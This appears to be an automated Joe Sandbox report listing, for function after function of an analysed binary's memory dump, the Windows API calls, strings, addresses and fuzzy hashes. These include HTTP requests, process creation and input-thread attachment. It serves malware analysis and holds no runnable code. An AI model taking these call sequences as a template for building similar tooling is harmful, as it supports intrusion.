                                                                                                                APIs
                                                                                                                  • Part of subcall function 00D4CAEE: _memmove.LIBCMT ref: 00D4CB2F
                                                                                                                • SendMessageW.USER32(?,00000186,00000002,00000000), ref: 00D7C869
                                                                                                                • GetDlgCtrlID.USER32 ref: 00D7C874
                                                                                                                • GetParent.USER32 ref: 00D7C890
                                                                                                                • SendMessageW.USER32(00000000,?,00000111,?), ref: 00D7C893
                                                                                                                • GetDlgCtrlID.USER32(?), ref: 00D7C89C
                                                                                                                • GetParent.USER32(?), ref: 00D7C8B8
                                                                                                                • SendMessageW.USER32(00000000,?,?,00000111), ref: 00D7C8BB
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000008.00000002.1804505540.0000000000D41000.00000020.00000001.01000000.00000009.sdmp, Offset: 00D40000, based on PE: true
                                                                                                                • Associated: 00000008.00000002.1804478995.0000000000D40000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.1804589948.0000000000DCD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.1804589948.0000000000DEE000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.1804749338.0000000000DFA000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.1804775132.0000000000E04000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_8_2_d40000_OJTLMJ.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: MessageSend$CtrlParent$_memmove
                                                                                                                • String ID: ComboBox$ListBox
                                                                                                                • API String ID: 313823418-1403004172
                                                                                                                • Opcode ID: cd5d4ee9939dcf85a757cef5f2cc82fde6d36bf8841060618eb4f971ec6d365a
                                                                                                                • Instruction ID: 70b80e35cabf6aa16a58c401467461fec1cf34cd089b7a3f6e25a50a2ced4609
                                                                                                                • Opcode Fuzzy Hash: cd5d4ee9939dcf85a757cef5f2cc82fde6d36bf8841060618eb4f971ec6d365a
                                                                                                                • Instruction Fuzzy Hash: B721A171940209AFDF00ABA4CC85EBEB775EB45300F144156F555E3291EB78981ADB30
                                                                                                                APIs
                                                                                                                • GetParent.USER32 ref: 00D7C8D9
                                                                                                                • GetClassNameW.USER32(00000000,?,00000100), ref: 00D7C8EE
                                                                                                                • _wcscmp.LIBCMT ref: 00D7C900
                                                                                                                • SendMessageW.USER32(00000000,00000111,0000702B,00000000), ref: 00D7C97B
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000008.00000002.1804505540.0000000000D41000.00000020.00000001.01000000.00000009.sdmp, Offset: 00D40000, based on PE: true
                                                                                                                • Associated: 00000008.00000002.1804478995.0000000000D40000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.1804589948.0000000000DCD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.1804589948.0000000000DEE000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.1804749338.0000000000DFA000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.1804775132.0000000000E04000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_8_2_d40000_OJTLMJ.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: ClassMessageNameParentSend_wcscmp
                                                                                                                • String ID: SHELLDLL_DefView$details$largeicons$list$smallicons
                                                                                                                • API String ID: 1704125052-3381328864
                                                                                                                • Opcode ID: 68e97342e34364086a9a042dbd50b8b2d64f5f127642bab137559286d02897bf
                                                                                                                • Instruction ID: c7be52da7daed431d02793c6f87e45f3a0830825d26dd7143ed3948d22ebc096
                                                                                                                • Opcode Fuzzy Hash: 68e97342e34364086a9a042dbd50b8b2d64f5f127642bab137559286d02897bf
                                                                                                                • Instruction Fuzzy Hash: 0C112C7A258307BEF6542A34DC0BCB677DCDB07361B20802AFF04E50D6FBA1A9018974
                                                                                                                APIs
                                                                                                                • VariantInit.OLEAUT32(?), ref: 00D9B777
                                                                                                                • CoInitialize.OLE32(00000000), ref: 00D9B7A4
                                                                                                                • CoUninitialize.OLE32 ref: 00D9B7AE
                                                                                                                • GetRunningObjectTable.OLE32(00000000,?), ref: 00D9B8AE
                                                                                                                • SetErrorMode.KERNEL32(00000001,00000029), ref: 00D9B9DB
                                                                                                                • CoGetInstanceFromFile.OLE32(00000000,?,00000000,00000015,00000002), ref: 00D9BA0F
                                                                                                                • CoGetObject.OLE32(?,00000000,00DCD91C,?), ref: 00D9BA32
                                                                                                                • SetErrorMode.KERNEL32(00000000), ref: 00D9BA45
                                                                                                                • SetErrorMode.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 00D9BAC5
                                                                                                                • VariantClear.OLEAUT32(00DCD91C), ref: 00D9BAD5
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000008.00000002.1804505540.0000000000D41000.00000020.00000001.01000000.00000009.sdmp, Offset: 00D40000, based on PE: true
                                                                                                                • Associated: 00000008.00000002.1804478995.0000000000D40000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.1804589948.0000000000DCD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.1804589948.0000000000DEE000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.1804749338.0000000000DFA000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.1804775132.0000000000E04000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_8_2_d40000_OJTLMJ.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: ErrorMode$ObjectVariant$ClearFileFromInitInitializeInstanceRunningTableUninitialize
                                                                                                                • String ID:
                                                                                                                • API String ID: 2395222682-0
                                                                                                                • Opcode ID: 9d7c60ebad78fe15da0e40ab80d4e4d4090938f051f34f9e0a135fdac52ca277
                                                                                                                • Instruction ID: cc2069923781041fe1e4075f8b387a8717bbdbe5a35d044e84dd8863d41e0950
                                                                                                                • Opcode Fuzzy Hash: 9d7c60ebad78fe15da0e40ab80d4e4d4090938f051f34f9e0a135fdac52ca277
                                                                                                                • Instruction Fuzzy Hash: 6FC10471604305AFCB00DF68D98492AB7E9FF88714F05492EF98ADB251DB71ED05CB62
                                                                                                                APIs
                                                                                                                • SafeArrayGetVartype.OLEAUT32(?,00000000), ref: 00D8B137
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000008.00000002.1804505540.0000000000D41000.00000020.00000001.01000000.00000009.sdmp, Offset: 00D40000, based on PE: true
                                                                                                                • Associated: 00000008.00000002.1804478995.0000000000D40000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.1804589948.0000000000DCD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.1804589948.0000000000DEE000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.1804749338.0000000000DFA000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.1804775132.0000000000E04000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_8_2_d40000_OJTLMJ.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: ArraySafeVartype
                                                                                                                • String ID:
                                                                                                                • API String ID: 1725837607-0
                                                                                                                • Opcode ID: 8dd8d134a4e7e2ceb0fb4463f23e1bf780067bd4a009d705c54c2301060ce7b0
                                                                                                                • Instruction ID: d32421d89ac64caa44c39d8bb9929b554ac9cf8204ad28a617a88f52726a747d
                                                                                                                • Opcode Fuzzy Hash: 8dd8d134a4e7e2ceb0fb4463f23e1bf780067bd4a009d705c54c2301060ce7b0
                                                                                                                • Instruction Fuzzy Hash: A9C19D75A0421ADFDB04EF98C481BAEBBB4FF09325F24406AE656E7251D734A941CBB0
                                                                                                                APIs
                                                                                                                • __lock.LIBCMT ref: 00D6BA74
                                                                                                                  • Part of subcall function 00D68984: __mtinitlocknum.LIBCMT ref: 00D68996
                                                                                                                  • Part of subcall function 00D68984: EnterCriticalSection.KERNEL32(00D60127,?,00D6876D,0000000D), ref: 00D689AF
                                                                                                                • __calloc_crt.LIBCMT ref: 00D6BA85
                                                                                                                  • Part of subcall function 00D67616: __calloc_impl.LIBCMT ref: 00D67625
                                                                                                                  • Part of subcall function 00D67616: Sleep.KERNEL32(00000000,?,00D60127,?,00D4125D,00000058,?,?), ref: 00D6763C
                                                                                                                • @_EH4_CallFilterFunc@8.LIBCMT ref: 00D6BAA0
                                                                                                                • GetStartupInfoW.KERNEL32(?,00DF6990,00000064,00D66B14,00DF67D8,00000014), ref: 00D6BAF9
                                                                                                                • __calloc_crt.LIBCMT ref: 00D6BB44
                                                                                                                • GetFileType.KERNEL32(00000001), ref: 00D6BB8B
                                                                                                                • InitializeCriticalSectionAndSpinCount.KERNEL32(0000000D,00000FA0), ref: 00D6BBC4
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000008.00000002.1804505540.0000000000D41000.00000020.00000001.01000000.00000009.sdmp, Offset: 00D40000, based on PE: true
                                                                                                                • Associated: 00000008.00000002.1804478995.0000000000D40000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.1804589948.0000000000DCD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.1804589948.0000000000DEE000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.1804749338.0000000000DFA000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.1804775132.0000000000E04000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_8_2_d40000_OJTLMJ.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: CriticalSection__calloc_crt$CallCountEnterFileFilterFunc@8InfoInitializeSleepSpinStartupType__calloc_impl__lock__mtinitlocknum
                                                                                                                • String ID:
                                                                                                                • API String ID: 1426640281-0
                                                                                                                • Opcode ID: edecfacaad21ec66a4376013396f3d63bdbf716246f54915854b6fa48fe95b39
                                                                                                                • Instruction ID: b781269b017542c58a5c67b76077a5d189de08d9dec1cf09ba45f3deb5f988f8
                                                                                                                • Opcode Fuzzy Hash: edecfacaad21ec66a4376013396f3d63bdbf716246f54915854b6fa48fe95b39
                                                                                                                • Instruction Fuzzy Hash: 1281A1709047458FDB24CF68C8846A9BBF0EF45334B28426ED4A6EB3D1DB359986CB74
                                                                                                                APIs
                                                                                                                • __swprintf.LIBCMT ref: 00D87226
                                                                                                                • __swprintf.LIBCMT ref: 00D87233
                                                                                                                  • Part of subcall function 00D6234B: __woutput_l.LIBCMT ref: 00D623A4
                                                                                                                • FindResourceW.KERNEL32(?,?,0000000E), ref: 00D8725D
                                                                                                                • LoadResource.KERNEL32(?,00000000), ref: 00D87269
                                                                                                                • LockResource.KERNEL32(00000000), ref: 00D87276
                                                                                                                • FindResourceW.KERNEL32(?,?,00000003), ref: 00D87296
                                                                                                                • LoadResource.KERNEL32(?,00000000), ref: 00D872A8
                                                                                                                • SizeofResource.KERNEL32(?,00000000), ref: 00D872B7
                                                                                                                • LockResource.KERNEL32(?), ref: 00D872C3
                                                                                                                • CreateIconFromResourceEx.USER32(?,?,00000001,00030000,00000000,00000000,00000000), ref: 00D87322
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000008.00000002.1804505540.0000000000D41000.00000020.00000001.01000000.00000009.sdmp, Offset: 00D40000, based on PE: true
                                                                                                                • Associated: 00000008.00000002.1804478995.0000000000D40000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.1804589948.0000000000DCD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.1804589948.0000000000DEE000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.1804749338.0000000000DFA000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.1804775132.0000000000E04000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_8_2_d40000_OJTLMJ.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Resource$FindLoadLock__swprintf$CreateFromIconSizeof__woutput_l
                                                                                                                • String ID:
                                                                                                                • API String ID: 1433390588-0
                                                                                                                • Opcode ID: 503081db5ee530f4d0bcaee4dd76bb4af0b65106995f4266d615cd1eca3dd2f9
                                                                                                                • Instruction ID: 28d389dec1d952cf7f397bc8a74f6d00ea116f264af09e17fffff9076e7c45ec
                                                                                                                • Opcode Fuzzy Hash: 503081db5ee530f4d0bcaee4dd76bb4af0b65106995f4266d615cd1eca3dd2f9
                                                                                                                • Instruction Fuzzy Hash: 42318DB1A0425BABDB01AF61DC89EBFBBA9FF08341B244425F911E6250E734D950DBB4
                                                                                                                APIs
                                                                                                                • GetCurrentThreadId.KERNEL32 ref: 00D84A7D
                                                                                                                • GetForegroundWindow.USER32(00000000,?,?,?,?,?,00D83AD7,?,00000001), ref: 00D84A91
                                                                                                                • GetWindowThreadProcessId.USER32(00000000), ref: 00D84A98
                                                                                                                • AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,00D83AD7,?,00000001), ref: 00D84AA7
                                                                                                                • GetWindowThreadProcessId.USER32(?,00000000), ref: 00D84AB9
                                                                                                                • AttachThreadInput.USER32(?,00000000,00000001,?,?,?,?,?,00D83AD7,?,00000001), ref: 00D84AD2
                                                                                                                • AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,00D83AD7,?,00000001), ref: 00D84AE4
                                                                                                                • AttachThreadInput.USER32(00000000,00000000,?,?,?,?,?,00D83AD7,?,00000001), ref: 00D84B29
                                                                                                                • AttachThreadInput.USER32(?,?,00000000,?,?,?,?,?,00D83AD7,?,00000001), ref: 00D84B3E
                                                                                                                • AttachThreadInput.USER32(00000000,?,00000000,?,?,?,?,?,00D83AD7,?,00000001), ref: 00D84B49
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000008.00000002.1804505540.0000000000D41000.00000020.00000001.01000000.00000009.sdmp, Offset: 00D40000, based on PE: true
                                                                                                                • Associated: 00000008.00000002.1804478995.0000000000D40000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.1804589948.0000000000DCD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.1804589948.0000000000DEE000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.1804749338.0000000000DFA000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.1804775132.0000000000E04000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_8_2_d40000_OJTLMJ.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Thread$AttachInput$Window$Process$CurrentForeground
                                                                                                                • String ID:
                                                                                                                • API String ID: 2156557900-0
                                                                                                                • Opcode ID: 4b1cd487686eb668dab51459e8fe5a209cc1fd7a8d88f040a82a1959acf1912a
                                                                                                                • Instruction ID: f0619965386474b1639660bd1641acd2c35364f225d870d99ac7a15fc75c25a7
                                                                                                                • Opcode Fuzzy Hash: 4b1cd487686eb668dab51459e8fe5a209cc1fd7a8d88f040a82a1959acf1912a
                                                                                                                • Instruction Fuzzy Hash: 2231C171610307AFDB10EB65DC88F6AB7AEAB50311F184119F905E7290D3B5ED86CB70
                                                                                                                APIs
                                                                                                                • GetClientRect.USER32(?), ref: 00DBEC32
                                                                                                                • SendMessageW.USER32(?,00001328,00000000,?), ref: 00DBEC49
                                                                                                                • GetWindowDC.USER32(?), ref: 00DBEC55
                                                                                                                • GetPixel.GDI32(00000000,?,?), ref: 00DBEC64
                                                                                                                • ReleaseDC.USER32(?,00000000), ref: 00DBEC76
                                                                                                                • GetSysColor.USER32(00000005), ref: 00DBEC94
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000008.00000002.1804505540.0000000000D41000.00000020.00000001.01000000.00000009.sdmp, Offset: 00D40000, based on PE: true
                                                                                                                • Associated: 00000008.00000002.1804478995.0000000000D40000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.1804589948.0000000000DCD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.1804589948.0000000000DEE000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.1804749338.0000000000DFA000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.1804775132.0000000000E04000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_8_2_d40000_OJTLMJ.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: ClientColorMessagePixelRectReleaseSendWindow
                                                                                                                • String ID:
                                                                                                                • API String ID: 272304278-0
                                                                                                                • Opcode ID: 2330d5f3116588fd5a1630b18b75cfc63ac21ea41a6f168f2537897efc893799
                                                                                                                • Instruction ID: 466ebeac19caabca7ebb66432a607399ac9a172bdecad4960292070ef37c0fdd
                                                                                                                • Opcode Fuzzy Hash: 2330d5f3116588fd5a1630b18b75cfc63ac21ea41a6f168f2537897efc893799
                                                                                                                • Instruction Fuzzy Hash: 16214A31500706EFDB21AB64EC48FEA7BA2EB05322F144225FA66A52E1CB314945DF31
                                                                                                                APIs
                                                                                                                • EnumChildWindows.USER32(?,00D7DD46), ref: 00D7DC86
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000008.00000002.1804505540.0000000000D41000.00000020.00000001.01000000.00000009.sdmp, Offset: 00D40000, based on PE: true
                                                                                                                • Associated: 00000008.00000002.1804478995.0000000000D40000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.1804589948.0000000000DCD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.1804589948.0000000000DEE000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.1804749338.0000000000DFA000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.1804775132.0000000000E04000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_8_2_d40000_OJTLMJ.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: ChildEnumWindows
                                                                                                                • String ID: CLASS$CLASSNN$INSTANCE$NAME$REGEXPCLASS$TEXT
                                                                                                                • API String ID: 3555792229-1603158881
                                                                                                                • Opcode ID: 914b3c7756a67a2353c1f64d1d8c264daf70794a8f370be5f9e2cccda63e371c
                                                                                                                • Instruction ID: 1d94acdbe09f92dc2418b3b696cf027d69e192558e6f4ae9443e8d22756a4c50
                                                                                                                • Opcode Fuzzy Hash: 914b3c7756a67a2353c1f64d1d8c264daf70794a8f370be5f9e2cccda63e371c
                                                                                                                • Instruction Fuzzy Hash: 33919270A00606ABCB08DF64C491BE9FB76FF19310F58C519DD9EA7251EB30A959CBB0
                                                                                                                APIs
                                                                                                                • SetWindowLongW.USER32(?,000000EB), ref: 00D5C2D2
                                                                                                                  • Part of subcall function 00D5C697: GetClientRect.USER32(?,?), ref: 00D5C6C0
                                                                                                                  • Part of subcall function 00D5C697: GetWindowRect.USER32(?,?), ref: 00D5C701
                                                                                                                  • Part of subcall function 00D5C697: ScreenToClient.USER32(?,?), ref: 00D5C729
                                                                                                                • GetDC.USER32 ref: 00DBE006
                                                                                                                • SendMessageW.USER32(?,00000031,00000000,00000000), ref: 00DBE019
                                                                                                                • SelectObject.GDI32(00000000,00000000), ref: 00DBE027
                                                                                                                • SelectObject.GDI32(00000000,00000000), ref: 00DBE03C
                                                                                                                • ReleaseDC.USER32(?,00000000), ref: 00DBE044
                                                                                                                • MoveWindow.USER32(?,?,?,?,?,?,?,00000031,00000000,00000000), ref: 00DBE0CF
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000008.00000002.1804505540.0000000000D41000.00000020.00000001.01000000.00000009.sdmp, Offset: 00D40000, based on PE: true
                                                                                                                • Associated: 00000008.00000002.1804478995.0000000000D40000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.1804589948.0000000000DCD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.1804589948.0000000000DEE000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.1804749338.0000000000DFA000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.1804775132.0000000000E04000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_8_2_d40000_OJTLMJ.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Window$ClientObjectRectSelect$LongMessageMoveReleaseScreenSend
                                                                                                                • String ID: U
                                                                                                                • API String ID: 4009187628-3372436214
                                                                                                                • Opcode ID: 7f7bf4949738e123c19951fddb630f22dd4880a3c0c6e1b4453c09dee4e84bbc
                                                                                                                • Instruction ID: 6acb085641083bfedffecc36d729463b87fb51cab44efb218750067503e48360
                                                                                                                • Opcode Fuzzy Hash: 7f7bf4949738e123c19951fddb630f22dd4880a3c0c6e1b4453c09dee4e84bbc
                                                                                                                • Instruction Fuzzy Hash: 1571DF31400209EFCF219F64CC80AEA7BB6FF49351F184269ED969B2A6D731C885DB71
                                                                                                                APIs
                                                                                                                • InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 00D94C5E
                                                                                                                • HttpOpenRequestW.WININET(00000000,00000000,?,00000000,00000000,00000000,?,00000000), ref: 00D94C8A
                                                                                                                • InternetQueryOptionW.WININET(00000000,0000001F,00000000,?), ref: 00D94CCC
                                                                                                                • InternetSetOptionW.WININET(00000000,0000001F,00000100,00000004), ref: 00D94CE1
                                                                                                                • HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00D94CEE
                                                                                                                • HttpQueryInfoW.WININET(00000000,00000005,?,?,00000000), ref: 00D94D1E
                                                                                                                • InternetCloseHandle.WININET(00000000), ref: 00D94D65
                                                                                                                  • Part of subcall function 00D956A9: GetLastError.KERNEL32(?,?,00D94A2B,00000000,00000000,00000001), ref: 00D956BE
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000008.00000002.1804505540.0000000000D41000.00000020.00000001.01000000.00000009.sdmp, Offset: 00D40000, based on PE: true
                                                                                                                • Associated: 00000008.00000002.1804478995.0000000000D40000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.1804589948.0000000000DCD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.1804589948.0000000000DEE000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.1804749338.0000000000DFA000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.1804775132.0000000000E04000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_8_2_d40000_OJTLMJ.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Internet$Http$OptionQueryRequest$CloseConnectErrorHandleInfoLastOpenSend
                                                                                                                • String ID:
                                                                                                                • API String ID: 1241431887-3916222277
                                                                                                                • Opcode ID: 85e5bbd383633b084f195b4c07f362b149d3e65d1ed7004978a77bdd26d5fc55
                                                                                                                • Instruction ID: 6fedf22ece58ab35921ff8dc76d83842d6d13a5edd850ffb478e7a5a58df796a
                                                                                                                • Opcode Fuzzy Hash: 85e5bbd383633b084f195b4c07f362b149d3e65d1ed7004978a77bdd26d5fc55
                                                                                                                • Instruction Fuzzy Hash: 77417EB5501619BFEF129FA0CC89FBB77ADEF08314F14412AFA019A196D7B099458BB0
                                                                                                                APIs
                                                                                                                • GetModuleFileNameW.KERNEL32(?,?,00000104,?,00DDDBF0), ref: 00D9BBA1
                                                                                                                • FreeLibrary.KERNEL32(00000000,00000001,00000000,?,00DDDBF0), ref: 00D9BBD5
                                                                                                                • QueryPathOfRegTypeLib.OLEAUT32(?,?,?,?,?), ref: 00D9BD33
                                                                                                                • SysFreeString.OLEAUT32(?), ref: 00D9BD5D
                                                                                                                • StringFromGUID2.OLE32(?,?,00000028,?,00DDDBF0), ref: 00D9BEAD
                                                                                                                • ProgIDFromCLSID.OLE32(?,?,?,00DDDBF0), ref: 00D9BEF7
                                                                                                                • CoTaskMemFree.OLE32(?,?,?,00DDDBF0), ref: 00D9BF14
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000008.00000002.1804505540.0000000000D41000.00000020.00000001.01000000.00000009.sdmp, Offset: 00D40000, based on PE: true
                                                                                                                • Associated: 00000008.00000002.1804478995.0000000000D40000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.1804589948.0000000000DCD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.1804589948.0000000000DEE000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.1804749338.0000000000DFA000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.1804775132.0000000000E04000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_8_2_d40000_OJTLMJ.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Free$FromString$FileLibraryModuleNamePathProgQueryTaskType
                                                                                                                • String ID:
                                                                                                                • API String ID: 793797124-0
                                                                                                                • Opcode ID: 0c3f9e5f9e6935b657dd5419334d893e46ed54fac5bb9da4eaef2501a523a553
                                                                                                                • Instruction ID: d6247ed3e769d379cda6e212304e912734bd7f98060e9a47786fdff2e0e10812
                                                                                                                • Opcode Fuzzy Hash: 0c3f9e5f9e6935b657dd5419334d893e46ed54fac5bb9da4eaef2501a523a553
                                                                                                                • Instruction Fuzzy Hash: 48F12975A00209EFCF14DFA4D984EAEB7BAFF89314F158459F905AB250DB31AE41CB60
                                                                                                                APIs
                                                                                                                • _memset.LIBCMT ref: 00DA23E6
                                                                                                                • GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 00DA2579
                                                                                                                • GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 00DA259D
                                                                                                                • GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 00DA25DD
                                                                                                                • GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 00DA25FF
                                                                                                                • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,?,?,00000000,?,?,?), ref: 00DA2760
                                                                                                                • GetLastError.KERNEL32(00000000,00000001,00000000), ref: 00DA2792
                                                                                                                • CloseHandle.KERNEL32(?), ref: 00DA27C1
                                                                                                                • CloseHandle.KERNEL32(?), ref: 00DA2838
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000008.00000002.1804505540.0000000000D41000.00000020.00000001.01000000.00000009.sdmp, Offset: 00D40000, based on PE: true
                                                                                                                • Associated: 00000008.00000002.1804478995.0000000000D40000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.1804589948.0000000000DCD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.1804589948.0000000000DEE000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.1804749338.0000000000DFA000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.1804775132.0000000000E04000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_8_2_d40000_OJTLMJ.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Directory$CloseCurrentHandleSystem$CreateErrorLastProcess_memset
                                                                                                                • String ID:
                                                                                                                • API String ID: 4090791747-0
                                                                                                                • Opcode ID: 770bd9a351057ff662280ffe6dae71636144a128fed15567c833fe6b27c30684
                                                                                                                • Instruction ID: 44b4c68ddcc9843ca11ba70481a3ed8adcc46eef9d7b0682e43fd4d3d5cde713
                                                                                                                • Opcode Fuzzy Hash: 770bd9a351057ff662280ffe6dae71636144a128fed15567c833fe6b27c30684
                                                                                                                • Instruction Fuzzy Hash: 4AD1A0316043019FCB14EF29C891B6ABBE1EF8A350F18845DF8899B2A1DB71DD45CB72
                                                                                                                APIs
                                                                                                                • select.WSOCK32 ref: 00D99B38
                                                                                                                • WSAGetLastError.WSOCK32(00000000), ref: 00D99B45
                                                                                                                • __WSAFDIsSet.WSOCK32(00000000,?,00000000), ref: 00D99B6F
